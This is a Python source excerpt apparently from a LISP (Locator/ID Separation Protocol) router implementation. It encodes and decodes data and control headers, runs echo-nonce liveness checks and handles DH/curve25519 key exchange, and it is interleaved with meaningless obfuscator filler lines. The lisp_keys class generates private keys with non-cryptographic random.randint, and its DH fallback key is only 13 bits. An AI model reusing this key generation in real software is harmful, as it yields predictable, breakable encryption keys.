if 50 - 50: I1IiiI - oO0o + oO0o * I11i + oO0o
if 70 - 70: i1IIi % OoO0O00 / i1IIi
if 30 - 30: OoOoOO00 - i11iIiiIii
if 94 - 94: OoOoOO00 % iII111i
if 39 - 39: OoOoOO00 + I1Ii111 % O0
if 26 - 26: ooOoO0o + OoOoOO00
if 17 - 17: I1ii11iIi11i - iII111i % Oo0Ooo * O0 % O0 * OOooOOo
if 6 - 6: I1Ii111
if 46 - 46: II111iiii * I1Ii111
if 23 - 23: i1IIi - O0
#
# Flag bits of the first 32-bit word of the LISP data-plane header
# (see lisp_data_header below, which sets/tests these).
#
LISP_N_BIT = 0x80000000 # nonce present (set by nonce()/request_nonce())
LISP_L_BIT = 0x40000000 # locator-status-bits field valid
LISP_E_BIT = 0x20000000 # echo-nonce request
LISP_V_BIT = 0x10000000 # map-version present
LISP_I_BIT = 0x08000000 # instance-id present
LISP_P_BIT = 0x04000000 # presumably the RFC 6830 unused/P flag -- not set here
LISP_K_BITS = 0x03000000 # 2-bit key-id field (nonzero => payload encrypted)
if 6 - 6: ooOoO0o % OoooooooOO * I1Ii111 - IiII
class lisp_data_header ( ) :
    """
    Encoder/decoder for the 8-byte LISP data-plane header: a 32-bit
    flags/nonce word (first_long) followed by a 32-bit instance-id /
    locator-status word (second_long).  k_bits caches the decoded
    2-bit key-id field.
    """
    def __init__(self):
        self.first_long = 0
        self.second_long = 0
        self.k_bits = 0

    def print_header(self, e_or_d):
        # Render the flag bits as upper/lower-case letters followed by
        # the 24-bit nonce and the iid/lsb word, prefixed with the
        # supplied encap/decap tag.
        flags = ""
        for bit, letter in ((LISP_N_BIT, "n"), (LISP_L_BIT, "l"),
                            (LISP_E_BIT, "e"), (LISP_V_BIT, "v"),
                            (LISP_I_BIT, "i"), (LISP_P_BIT, "p")):
            flags += letter.upper() if (self.first_long & bit) else letter
        flags += "K" if (self.k_bits in [2, 3]) else "k"
        flags += "K" if (self.k_bits in [1, 3]) else "k"

        nonce = lisp_hex_string(self.first_long & 0xffffff)
        iid_lsb = lisp_hex_string(self.second_long).zfill(8)
        line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " +
            "iid/lsb: {}")
        return (line.format(bold(e_or_d, False), flags[0], flags[1],
            flags[2], flags[3], flags[4], flags[5], flags[6], flags[7],
            nonce, iid_lsb))

    def encode(self):
        # Both words go on the wire in network byte order.
        return (struct.pack("II", socket.htonl(self.first_long),
            socket.htonl(self.second_long)))

    def decode(self, packet):
        # Returns True when 8 bytes were parsed, False on a short
        # buffer.
        header_size = struct.calcsize("II")
        if (len(packet) < header_size): return (False)

        first, second = struct.unpack("II", packet[:header_size])
        self.first_long = socket.ntohl(first)
        self.second_long = socket.ntohl(second)
        self.k_bits = (self.first_long & LISP_K_BITS) >> 24
        return (True)

    def key_id(self, key_id):
        # Replace the 2-bit key-id field and cache it.
        self.first_long &= ~(0x3 << 24)
        self.first_long |= ((key_id & 0x3) << 24)
        self.k_bits = key_id

    def nonce(self, nonce):
        self.first_long |= (LISP_N_BIT | nonce)

    def map_version(self, version):
        self.first_long |= (LISP_V_BIT | version)

    def instance_id(self, iid):
        if (iid == 0): return
        self.first_long |= LISP_I_BIT
        self.second_long = (self.second_long & 0xff) | (iid << 8)

    def get_instance_id(self):
        return ((self.second_long >> 8) & 0xffffff)

    def locator_status_bits(self, lsbs):
        self.first_long |= LISP_L_BIT
        self.second_long = (self.second_long & 0xffffff00) | (lsbs & 0xff)

    def is_request_nonce(self, nonce):
        return (nonce & 0x80000000)

    def request_nonce(self, nonce):
        # A request-nonce carries the echo-nonce-request (E) and
        # nonce-present (N) bits plus the low 24 nonce bits.
        self.first_long |= (LISP_E_BIT | LISP_N_BIT | (nonce & 0xffffff))

    def is_e_bit_set(self):
        return (self.first_long & LISP_E_BIT)

    def get_nonce(self):
        return (self.first_long & 0xffffff)
if 78 - 78: I11i - iIii1I11I1II1 + I1Ii111 - I1ii11iIi11i - I1Ii111
if 21 - 21: OoooooooOO . O0 / i11iIiiIii
if 86 - 86: OoOoOO00 / OOooOOo
class lisp_echo_nonce():
    """Echo-nonce liveness state for one remote RLOC.

    One instance exists per RLOC string; creating it registers the instance
    in the global lisp_nonce_echo_list table.  The state machine runs the
    request-nonce / echo-nonce exchange: we either ask the peer to echo a
    nonce we generate (request-nonce mode) or we echo back a nonce the peer
    requested.  Timestamps record when each event last happened so callers
    can decide RLOC up/down state.
    """

    def __init__(self, rloc_str):
        self.rloc_str = rloc_str
        self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)

        # Request-nonce side: nonces we asked the peer to echo.
        self.request_nonce_sent = None
        self.last_request_nonce_sent = None
        self.last_new_request_nonce_sent = None

        # Echo side: nonces we are echoing back to the peer.
        self.echo_nonce_sent = None
        self.last_echo_nonce_sent = None
        self.last_new_echo_nonce_sent = None

        # Peer-originated events.
        self.request_nonce_rcvd = None
        self.echo_nonce_rcvd = None
        self.last_request_nonce_rcvd = None
        self.last_echo_nonce_rcvd = None
        self.last_good_echo_nonce_rcvd = None

        # Register globally so other components can find this state.
        lisp_nonce_echo_list[rloc_str] = self

    def send_ipc(self, ipc_socket, ipc):
        """Forward an echo-nonce IPC message to the companion process.

        The ITR and ETR processes mirror each other's nonce state; pick
        source/destination names based on which process we are.
        """
        me = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
        peer = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
        ipc = lisp_command_ipc(ipc, me)
        lisp_ipc(ipc, ipc_socket, peer)

    def send_request_ipc(self, ipc_socket, nonce):
        """Tell the companion process we started request-nonce mode."""
        message = "nonce%R%{}%{}".format(self.rloc_str, lisp_hex_string(nonce))
        self.send_ipc(ipc_socket, message)

    def send_echo_ipc(self, ipc_socket, nonce):
        """Tell the companion process we are echoing a nonce."""
        message = "nonce%E%{}%{}".format(self.rloc_str, lisp_hex_string(nonce))
        self.send_ipc(ipc_socket, message)

    def receive_request(self, ipc_socket, nonce):
        """Peer asked us to echo *nonce*; record it and inform the peer process."""
        previous = self.request_nonce_rcvd
        self.request_nonce_rcvd = nonce
        self.last_request_nonce_rcvd = lisp_get_timestamp()
        # An RTR runs both roles in one process; no IPC needed.
        if (lisp_i_am_rtr): return
        # Only notify the companion process when the nonce changed.
        if (previous != nonce): self.send_request_ipc(ipc_socket, nonce)

    def receive_echo(self, ipc_socket, nonce):
        """Peer echoed a nonce back; accept it only if it matches our request."""
        if (self.request_nonce_sent != nonce): return
        self.last_echo_nonce_rcvd = lisp_get_timestamp()

        # Duplicate echo -- already processed.
        if (self.echo_nonce_rcvd == nonce): return
        self.echo_nonce_rcvd = nonce
        if (lisp_i_am_rtr): return
        self.send_echo_ipc(ipc_socket, nonce)

    def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
        """Return the nonce to put in the next data packet.

        Returns a plain nonce when echoing the peer's request, a nonce with
        the high bit (0x80000000) set when in request-nonce mode, or None
        when request-nonce mode just timed out.
        """
        #
        # Collision: both sides are in request-nonce mode.  Tie-break on
        # address so exactly one side stays in request-nonce mode.
        #
        if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
            my_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() else \
                lisp_myrlocs[1]

            if (remote_rloc.address > my_rloc.address):
                action = "exit"
                self.request_nonce_sent = None
            else:
                action = "stay in"
                self.echo_nonce_sent = None

            collision = bold("collision", False)
            local = red(my_rloc.print_address_no_iid(), False)
            remote = red(remote_rloc.print_address_no_iid(), False)
            lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(
                collision, local, remote, action))

        #
        # Peer asked us to echo -- do it once and clear the pending echo.
        #
        if (self.echo_nonce_sent != None):
            nonce = self.echo_nonce_sent
            echoing = bold("Echoing", False)
            lprint("{} nonce 0x{} to {}".format(echoing,
                lisp_hex_string(nonce), red(self.rloc_str, False)))
            self.last_echo_nonce_sent = lisp_get_timestamp()
            self.echo_nonce_sent = None
            return (nonce)

        #
        # If the request-nonce has been outstanding too long, give up on
        # request-nonce mode for now.
        #
        nonce = self.request_nonce_sent
        last_sent = self.last_request_nonce_sent
        if (nonce and last_sent != None):
            if (time.time() - last_sent >= LISP_NONCE_ECHO_INTERVAL):
                self.request_nonce_sent = None
                lprint("Stop request-nonce mode for {}, nonce 0x{}".format(
                    red(self.rloc_str, False), lisp_hex_string(nonce)))
                return (None)

        #
        # Start a new request-nonce cycle, or keep using the current one.
        #
        if (nonce == None):
            nonce = lisp_get_data_nonce()
            # Back off if we only recently finished a request cycle.
            if (self.recently_requested()): return (nonce)

            self.request_nonce_sent = nonce
            lprint("Start request-nonce mode for {}, nonce 0x{}".format(
                red(self.rloc_str, False), lisp_hex_string(nonce)))
            self.last_new_request_nonce_sent = lisp_get_timestamp()

            # Only the ITR informs its companion ETR process via IPC.
            if (lisp_i_am_itr == False): return (nonce | 0x80000000)
            self.send_request_ipc(ipc_socket, nonce)
        else:
            lprint("Continue request-nonce mode for {}, nonce 0x{}".format(
                red(self.rloc_str, False), lisp_hex_string(nonce)))

        self.last_request_nonce_sent = lisp_get_timestamp()
        return (nonce | 0x80000000)

    def request_nonce_timeout(self):
        """True when our request-nonce went unanswered for a full interval."""
        if (self.request_nonce_sent == None): return (False)
        if (self.request_nonce_sent == self.echo_nonce_rcvd): return (False)

        elapsed = time.time() - self.last_request_nonce_sent
        return (elapsed >= LISP_NONCE_ECHO_INTERVAL and
            self.last_echo_nonce_rcvd == None)

    def recently_requested(self):
        """True when a request-nonce was sent within the echo interval."""
        last_sent = self.last_request_nonce_sent
        if (last_sent == None): return (False)
        return (time.time() - last_sent <= LISP_NONCE_ECHO_INTERVAL)

    def recently_echoed(self):
        """True when the peer echoed recently (or we never asked it to)."""
        if (self.request_nonce_sent == None): return (True)

        # A good echo within the interval counts.
        last = self.last_good_echo_nonce_rcvd
        if (last == None): last = 0
        if (time.time() - last <= LISP_NONCE_ECHO_INTERVAL): return (True)

        # Grace period: a brand-new request-nonce has not had time to be
        # echoed yet.
        last = self.last_new_request_nonce_sent
        if (last == None): last = 0
        return (time.time() - last <= LISP_NONCE_ECHO_INTERVAL)

    def change_state(self, rloc):
        """Move *rloc* between up and no-echoed-nonce states.

        Takes the RLOC down when echoes stopped arriving; brings it back up
        (to retry request-nonce mode) once we have stopped requesting.
        """
        if (rloc.up_state() and self.recently_echoed() == False):
            down = bold("down", False)
            elapsed = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
            lprint("Take {} {}, last good echo: {}".format(
                red(self.rloc_str, False), down, elapsed))
            rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
            rloc.last_state_change = lisp_get_timestamp()
            return

        if (rloc.no_echoed_nonce_state() == False): return

        if (self.recently_requested() == False):
            up = bold("up", False)
            lprint("Bring {} {}, retry request-nonce mode".format(
                red(self.rloc_str, False), up))
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()

    def print_echo_nonce(self):
        """Return a multi-line status string for show-command output."""
        req_sent = lisp_print_elapsed(self.last_request_nonce_sent)
        echo_rcvd = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
        echo_sent = lisp_print_elapsed(self.last_echo_nonce_sent)
        req_rcvd = lisp_print_elapsed(self.last_request_nonce_rcvd)
        indent = space(4)

        output = "Nonce-Echoing:\n"
        output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
            "received: {}\n").format(indent, req_sent, indent, echo_rcvd)
        output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
            "sent: {}").format(indent, req_rcvd, indent, echo_sent)
        return (output)
if 42 - 42: I1Ii111
if 70 - 70: o0oOOo0O0Ooo / I11i + oO0o % I1IiiI % Oo0Ooo + OoO0O00
if 80 - 80: OOooOOo
if 12 - 12: Ii1I
if 2 - 2: OoooooooOO
if 100 - 100: Oo0Ooo / O0 * i11iIiiIii * OoooooooOO
if 46 - 46: O0 % OoooooooOO
if 22 - 22: iII111i + OoooooooOO - OoOoOO00 - OoO0O00 * I1Ii111 - oO0o
if 99 - 99: ooOoO0o / I1IiiI . Ii1I - Ii1I * I1IiiI
class lisp_keys():
    """Key material for one LISP-crypto security association.

    Holds the Diffie-Hellman (cipher suite LISP_CS_1024) or ECDH
    curve25519 key pair, the negotiated cipher suite, and the derived
    encryption/ICV keys.  Instances are stored per nonce (while a
    Map-Request is outstanding) and per RLOC once the exchange completes.
    """

    def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
        do_poly=use_poly):
        self.uptime = lisp_get_timestamp()
        self.last_rekey = None
        self.rekey_count = 0
        self.use_count = 0
        self.key_id = key_id
        # Default to classic 1024-bit DH until a curve suite is chosen.
        self.cipher_suite = LISP_CS_1024
        self.dh_g_value = LISP_CS_1024_G
        self.dh_p_value = LISP_CS_1024_P
        self.curve25519 = None
        self.cipher_suite_string = ""
        if (do_curve):
            if (do_chacha):
                self.cipher_suite = LISP_CS_25519_CHACHA
                self.cipher_suite_string = "chacha"
            elif (os.getenv("LISP_USE_AES_GCM") != None):
                self.cipher_suite = LISP_CS_25519_GCM
                self.cipher_suite_string = "aes-gcm"
            else:
                self.cipher_suite = LISP_CS_25519_CBC
                self.cipher_suite_string = "aes-cbc"

            # 128-bit private key, zero-padded to 32 hex digits for the
            # curve25519 library.
            self.local_private_key = random.randint(0, 2**128 - 1)
            private_hex = lisp_hex_string(self.local_private_key).zfill(32)
            self.curve25519 = curve25519.Private(private_hex)
        else:
            self.local_private_key = random.randint(0, 0x1fff)

        self.local_public_key = self.compute_public_key()
        self.remote_public_key = None
        self.shared_key = None
        self.encrypt_key = None
        self.icv_key = None
        # ICV algorithm: poly1305 module or SHA-256 based HMAC.
        self.icv = poly1305 if do_poly else hashlib.sha256
        self.iv = None
        self.get_iv()
        self.do_poly = do_poly

    def copy_keypair(self, key):
        """Reuse another instance's key pair (avoids regenerating keys)."""
        self.local_private_key = key.local_private_key
        self.local_public_key = key.local_public_key
        self.curve25519 = key.curve25519

    def get_iv(self):
        """Return the next IV, packed per the active cipher suite.

        The IV starts random and is incremented per use; chacha takes 8
        bytes, GCM 12 bytes (4 high + 8 low), CBC the full 16 bytes.
        """
        if (self.iv == None):
            self.iv = random.randint(0, LISP_16_128_MASK)
        else:
            self.iv += 1

        iv = self.iv
        if (self.cipher_suite == LISP_CS_25519_CHACHA):
            iv = struct.pack("Q", iv & LISP_8_64_MASK)
        elif (self.cipher_suite == LISP_CS_25519_GCM):
            iv_high = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
            iv_low = struct.pack("Q", iv & LISP_8_64_MASK)
            iv = iv_high + iv_low
        else:
            iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
        return (iv)

    def key_length(self, key):
        """Return the key length in bytes of a hex-string encoded key."""
        if (type(key) != str): key = self.normalize_pub_key(key)
        # Python-2 integer division: two hex digits per byte.
        return (len(key) / 2)

    def print_key(self, key):
        """Return an abbreviated "0xhead...tail(len)" rendering of *key*."""
        normalized = self.normalize_pub_key(key)
        return ("0x{}...{}({})".format(normalized[0:4], normalized[-4::],
            self.key_length(normalized)))

    def normalize_pub_key(self, key):
        """Return *key* as a hex string.

        Curve25519 keys arrive as packed byte strings and are hexlified;
        DH integer keys are formatted and zero-padded to 256 hex digits.
        """
        if (type(key) == str):
            # Packed curve25519 key material.
            if (self.curve25519): return (binascii.hexlify(key))
            return (key)
        return (lisp_hex_string(key).zfill(256))

    def print_keys(self, do_bold=True):
        """Return a one-line summary of local/remote keys and cipher suite."""
        local = bold("local-key: ", False) if do_bold else "local-key: "
        if (self.local_public_key == None):
            local += "none"
        else:
            local += self.print_key(self.local_public_key)

        remote = bold("remote-key: ", False) if do_bold else "remote-key: "
        if (self.remote_public_key == None):
            remote += "none"
        else:
            remote += self.print_key(self.remote_public_key)

        exchange = "ECDH" if (self.curve25519) else "DH"
        return ("{} cipher-suite: {}, {}, {}".format(exchange,
            self.cipher_suite, local, remote))

    def compare_keys(self, keys):
        """True when *keys* has the same DH parameters and remote key."""
        if (self.dh_g_value != keys.dh_g_value): return (False)
        if (self.dh_p_value != keys.dh_p_value): return (False)
        if (self.remote_public_key != keys.remote_public_key): return (False)
        return (True)

    def compute_public_key(self):
        """Derive the public key from the stored private key."""
        if (self.curve25519): return (self.curve25519.get_public().public)

        # Classic DH: g^private mod p.
        private = self.local_private_key
        g = self.dh_g_value
        p = self.dh_p_value
        return (int((g ** private) % p))

    def compute_shared_key(self, ed, print_shared=False):
        """Compute the DH/ECDH shared secret and derive session keys.

        *ed* is "encap" or "decap" style text used only for logging.
        Also bumps the rekey counters.
        """
        private = self.local_private_key
        remote = self.remote_public_key

        banner = bold("Compute {} shared-key".format(ed), False)
        lprint("{}, key-material: {}".format(banner, self.print_keys()))

        if (self.curve25519):
            public = curve25519.Public(remote)
            self.shared_key = self.curve25519.get_shared_key(public)
        else:
            p = self.dh_p_value
            self.shared_key = (remote ** private) % p

        # Logging the shared secret is opt-in only (it is sensitive).
        if (print_shared):
            shared = self.print_key(self.shared_key)
            lprint("Computed shared-key: {}".format(shared))

        self.compute_encrypt_icv_keys()
        self.rekey_count += 1
        self.last_rekey = lisp_get_timestamp()

    def compute_encrypt_icv_keys(self):
        """Derive the encryption and ICV keys from the shared secret.

        HMAC-SHA256 over the shared secret, keyed with a context string
        that mixes both public keys; the 256-bit digest is split into a
        128-bit encrypt key and a 128-bit ICV key.
        """
        alg = hashlib.sha256
        if (self.curve25519):
            shared = self.shared_key
        else:
            shared = lisp_hex_string(self.shared_key)

        # Both public keys as integers for the key-derivation context.
        local = self.local_public_key
        if (type(local) != long): local = int(binascii.hexlify(local), 16)
        remote = self.remote_public_key
        if (type(remote) != long): remote = int(binascii.hexlify(remote), 16)
        context = "0001" + "lisp-crypto" + \
            lisp_hex_string(local ^ remote) + "0100"

        digest = hmac.new(context, shared, alg).hexdigest()
        digest = int(digest, 16)

        # High 128 bits -> encrypt key, low 128 bits -> ICV key.
        encrypt_key = (digest >> 128) & LISP_16_128_MASK
        icv_key = digest & LISP_16_128_MASK
        self.encrypt_key = lisp_hex_string(encrypt_key).zfill(32)
        # poly1305 wants a 128-bit key, HMAC-SHA256-160 a 160-bit key.
        fill = 32 if self.do_poly else 40
        self.icv_key = lisp_hex_string(icv_key).zfill(fill)

    def do_icv(self, packet, nonce):
        """Return the hex ICV for *packet* (empty string if no key yet)."""
        if (self.icv_key == None): return ("")
        if (self.do_poly):
            # NOTE(review): relies on the poly1305 module exposing
            # poly1305aes and a bundled binascii -- confirm module shape.
            poly = self.icv.poly1305aes
            hexlify = self.icv.binascii.hexlify
            nonce = hexlify(nonce)
            icv = poly(self.encrypt_key, self.icv_key, nonce, packet)
            icv = hexlify(icv)
        else:
            key = binascii.unhexlify(self.icv_key)
            icv = hmac.new(key, packet, self.icv).hexdigest()
            # Truncate HMAC-SHA256 to 160 bits (40 hex digits).
            icv = icv[0:40]
        return (icv)

    def add_key_by_nonce(self, nonce):
        """Index this key under *nonce* while the Map-Request is pending."""
        if (nonce not in lisp_crypto_keys_by_nonce):
            lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
        lisp_crypto_keys_by_nonce[nonce][self.key_id] = self

    def delete_key_by_nonce(self, nonce):
        """Remove the nonce-indexed entry (no-op if absent)."""
        if (nonce not in lisp_crypto_keys_by_nonce): return
        lisp_crypto_keys_by_nonce.pop(nonce)

    def add_key_by_rloc(self, addr_str, encap):
        """Index this key by RLOC address for the encap or decap side."""
        keys = lisp_crypto_keys_by_rloc_encap if encap else \
            lisp_crypto_keys_by_rloc_decap

        if (addr_str not in keys):
            keys[addr_str] = [None, None, None, None]
        keys[addr_str][self.key_id] = self

        # The decap key must also reach the data-plane via IPC.
        if (encap == False):
            lisp_write_ipc_decap_key(addr_str, keys[addr_str])

    def encode_lcaf(self, rloc_addr):
        """Encode this key as a Security-Type LCAF, optionally followed by
        the RLOC address, and return the packed bytes."""
        pub_key = self.normalize_pub_key(self.local_public_key)
        key_len = self.key_length(pub_key)
        lcaf_len = (6 + key_len + 2)
        if (rloc_addr != None): lcaf_len += rloc_addr.addr_length()

        packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
            LISP_LCAF_SECURITY_TYPE, 0, socket.htons(lcaf_len), 1, 0)

        # Cipher suite byte, reserved byte, then key length.
        packet += struct.pack("BBH", self.cipher_suite, 0,
            socket.htons(key_len))

        # Emit the key, 64 bits at a time, byte-swapped to network order.
        for offset in range(0, key_len * 2, 16):
            chunk = int(pub_key[offset:offset + 16], 16)
            packet += struct.pack("Q", byte_swap_64(chunk))

        if (rloc_addr):
            packet += struct.pack("H", socket.htons(rloc_addr.afi))
            packet += rloc_addr.pack_address()
        return (packet)

    def decode_lcaf(self, packet, lcaf_len):
        """Parse a Security-Type LCAF, storing the cipher suite and the
        remote public key.  Returns the remaining packet or None on error.

        When *lcaf_len* is 0 the LCAF header has not been consumed yet and
        is parsed here first; a non-security LCAF is skipped over.
        """
        if (lcaf_len == 0):
            header_format = "HHBBH"
            header_size = struct.calcsize(header_format)
            if (len(packet) < header_size): return (None)

            afi, x, lcaf_type, x, lcaf_len = struct.unpack(header_format,
                packet[:header_size])

            if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
                # Not for us -- skip the whole LCAF.
                packet = packet[lcaf_len + 6::]
                return (packet)
            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[header_size::]

        # Key-material sub-header: key count, reserved, cipher suite,
        # reserved, key length.
        key_format = "BBBBH"
        key_size = struct.calcsize(key_format)
        if (len(packet) < key_size): return (None)

        key_count, x, cipher_suite, x, key_len = struct.unpack(key_format,
            packet[:key_size])

        packet = packet[key_size::]
        key_len = socket.ntohs(key_len)
        if (len(packet) < key_len): return (None)

        supported = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
            LISP_CS_25519_CHACHA, LISP_CS_1024]
        if (cipher_suite not in supported):
            lprint("Cipher-suites {} supported, received {}".format(supported,
                cipher_suite))
            packet = packet[key_len::]
            return (packet)

        self.cipher_suite = cipher_suite

        # Reassemble the key from byte-swapped 64-bit chunks.
        pub_key = 0
        for offset in range(0, key_len, 8):
            chunk = byte_swap_64(struct.unpack("Q",
                packet[offset:offset + 8])[0])
            pub_key <<= 64
            pub_key |= chunk
        self.remote_public_key = pub_key

        # Curve25519 wants the key as a 32-byte packed string, not an int.
        if (self.curve25519):
            key_hex = lisp_hex_string(self.remote_public_key).zfill(64)
            packed = ""
            for offset in range(0, len(key_hex), 2):
                packed += chr(int(key_hex[offset:offset + 2], 16))
            self.remote_public_key = packed

        packet = packet[key_len::]
        return (packet)
if 63 - 63: I1Ii111 - oO0o - iII111i - ooOoO0o / oO0o + OoO0O00
if 94 - 94: IiII / I1IiiI . II111iiii
if 32 - 32: oO0o . OOooOOo % OOooOOo . OoOoOO00
if 37 - 37: OOooOOo + O0 + OOooOOo . iII111i . o0oOOo0O0Ooo
if 78 - 78: I1IiiI / I11i + o0oOOo0O0Ooo . Oo0Ooo / O0
if 49 - 49: I1ii11iIi11i
if 66 - 66: o0oOOo0O0Ooo . I1ii11iIi11i
if 18 - 18: Oo0Ooo + IiII
class lisp_thread():
    """Per-worker-thread context for packet processing.

    Bundles the thread's input queue, packet-rate statistics, and a
    reusable lisp_packet buffer so worker threads avoid reallocating one
    per packet.
    """

    def __init__(self, name):
        # Identity: name plus a number assigned later (-1 = unassigned).
        self.thread_name = name
        self.thread_number = -1
        # Pool sizing, filled in by the thread creator.
        self.number_of_pcap_threads = 0
        self.number_of_worker_threads = 0
        # Work arrives on this queue; stats count what was queued.
        self.input_queue = Queue.Queue()
        self.input_stats = lisp_stats()
        # Scratch packet object reused across iterations.
        self.lisp_packet = lisp_packet(None)
if 79 - 79: OoO0O00 - O0 + II111iiii % Ii1I . I1IiiI
if 43 - 43: I1IiiI % I1ii11iIi11i * Ii1I
if 31 - 31: Ii1I / iII111i
if 3 - 3: IiII
if 37 - 37: Ii1I * OoooooooOO * I11i + Oo0Ooo . I1IiiI
if 61 - 61: OOooOOo . OOooOOo
if 17 - 17: II111iiii / ooOoO0o
if 80 - 80: OOooOOo * OoO0O00 + Ii1I
if 62 - 62: OoooooooOO . O0 % Oo0Ooo
if 98 - 98: o0oOOo0O0Ooo * Oo0Ooo - Ii1I . ooOoO0o
if 2 - 2: Oo0Ooo - ooOoO0o % iIii1I11I1II1
if 88 - 88: I1Ii111 - OoO0O00
if 79 - 79: iII111i
if 45 - 45: II111iiii + iII111i . I11i . O0 * i1IIi - Ii1I
if 48 - 48: I1ii11iIi11i + Oo0Ooo
if 76 - 76: I1ii11iIi11i
if 98 - 98: II111iiii + I1IiiI - I1ii11iIi11i . Ii1I
if 51 - 51: Ii1I + i11iIiiIii * OoO0O00 % Oo0Ooo / I1IiiI - iIii1I11I1II1
class lisp_control_header():
    """Decoded fixed header of a LISP control message.

    Parses the first 12 bytes (type, flag bits, record count, nonce) and
    exposes the type-specific flags through boolean predicates.
    """

    def __init__(self):
        self.type = 0
        self.record_count = 0
        self.nonce = 0
        # Map-Request flags.
        self.rloc_probe = False
        self.smr_bit = False
        self.smr_invoked_bit = False
        # ECM flags.
        self.ddt_bit = False
        self.to_etr = False
        self.to_ms = False
        # NAT-traversal Info flag.
        self.info_reply = False

    def decode(self, packet):
        """Parse *packet*'s control header; False if it is too short."""
        header_format = "BBBBQ"
        header_size = struct.calcsize(header_format)
        if (len(packet) < header_size): return (False)

        byte0, byte1, byte2, self.record_count, self.nonce = \
            struct.unpack(header_format, packet[:header_size])

        # Message type lives in the top 4 bits of the first byte.
        self.type = byte0 >> 4

        if (self.type == LISP_MAP_REQUEST):
            self.smr_bit = (byte0 & 0x01) != 0
            self.rloc_probe = (byte0 & 0x02) != 0
            self.smr_invoked_bit = (byte1 & 0x40) != 0

        if (self.type == LISP_ECM):
            self.ddt_bit = (byte0 & 0x04) != 0
            self.to_etr = (byte0 & 0x02) != 0
            self.to_ms = (byte0 & 0x01) != 0

        if (self.type == LISP_NAT_INFO):
            self.info_reply = (byte0 & 0x08) != 0
        return (True)

    def is_info_request(self):
        """True for a NAT-Info message that is a request, not a reply."""
        return (self.type == LISP_NAT_INFO and not self.is_info_reply())

    def is_info_reply(self):
        return (bool(self.info_reply))

    def is_rloc_probe(self):
        return (bool(self.rloc_probe))

    def is_smr(self):
        return (bool(self.smr_bit))

    def is_smr_invoked(self):
        return (bool(self.smr_invoked_bit))

    def is_ddt(self):
        return (bool(self.ddt_bit))

    def is_to_etr(self):
        return (bool(self.to_etr))

    def is_to_ms(self):
        return (bool(self.to_ms))
if 63 - 63: oO0o
if 79 - 79: I1ii11iIi11i - oO0o - o0oOOo0O0Ooo . OOooOOo
if 65 - 65: i11iIiiIii . OoO0O00 % iII111i + IiII - i11iIiiIii
if 60 - 60: I1Ii111
if 14 - 14: Oo0Ooo % oO0o * iII111i - i11iIiiIii / I1ii11iIi11i * i11iIiiIii
if 95 - 95: iIii1I11I1II1 + OoOoOO00 . I1IiiI + OoOoOO00 * I11i + OOooOOo
if 14 - 14: Ii1I - O0
if 68 - 68: II111iiii - I1ii11iIi11i - OoO0O00 * iIii1I11I1II1 / I1IiiI * I1ii11iIi11i
if 45 - 45: I1Ii111 * I11i / iIii1I11I1II1 / I1IiiI % II111iiii
if 49 - 49: Ii1I / iII111i . iII111i . iII111i + i11iIiiIii % I11i
if 7 - 7: IiII * ooOoO0o + OoOoOO00
if 22 - 22: iII111i
if 48 - 48: I1ii11iIi11i . I1IiiI
if 73 - 73: O0 . I1Ii111 - OoooooooOO % I11i % i1IIi
if 14 - 14: I1Ii111 + Ii1I * Oo0Ooo
if 49 - 49: Oo0Ooo
if 57 - 57: O0 * ooOoO0o - iII111i - iIii1I11I1II1 * iII111i
if 9 - 9: IiII . I11i
if 23 - 23: O0 % OoooooooOO - O0 . I1IiiI + i11iIiiIii
if 96 - 96: ooOoO0o % O0
if 51 - 51: I1IiiI - iII111i / I1ii11iIi11i . I1ii11iIi11i + I1ii11iIi11i
if 87 - 87: II111iiii . Ii1I * OoO0O00
if 74 - 74: o0oOOo0O0Ooo % OoOoOO00 . iII111i % I1Ii111 . O0 % II111iiii
if 5 - 5: oO0o - OoooooooOO / OoOoOO00
if 30 - 30: I11i % o0oOOo0O0Ooo + i1IIi * OoooooooOO * OoO0O00 - II111iiii
if 55 - 55: OoO0O00
if 20 - 20: ooOoO0o * I1Ii111 * o0oOOo0O0Ooo - ooOoO0o
if 32 - 32: Ii1I * oO0o
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
